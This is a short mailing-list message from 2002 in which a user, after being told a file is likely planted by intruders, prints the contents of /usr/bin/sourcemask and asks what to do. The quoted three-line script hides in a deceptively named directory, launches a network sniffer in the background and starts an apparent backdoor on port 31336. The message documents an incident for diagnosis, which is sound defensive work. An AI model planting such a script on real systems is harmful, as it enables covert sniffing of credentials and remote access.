On Mon, 29 Jul 2002 00:08:09 -0700
Rick Moen <[EMAIL PROTECTED]> wrote:

> Quoting Emmanuel 'Manny' Amador ([EMAIL PROTECTED]):
> 
> > What does /usr/bin/sourcemask do anyways? 
> 
> If you check the file itself, you'll almost certainly find that it's a
> shell script that runs a binary named "snif", which is a network sniffer
> commonly installed by the bad guys after break-in.

I think you're right! Check this out:

   $ cat /usr/bin/sourcemask
     cd /usr/man/man1/"..  "/.dir
     ./snif >chipsul &
     /usr/bin/ras2xm -p 31336 -q

What should I do now?

Thanks! God bless!

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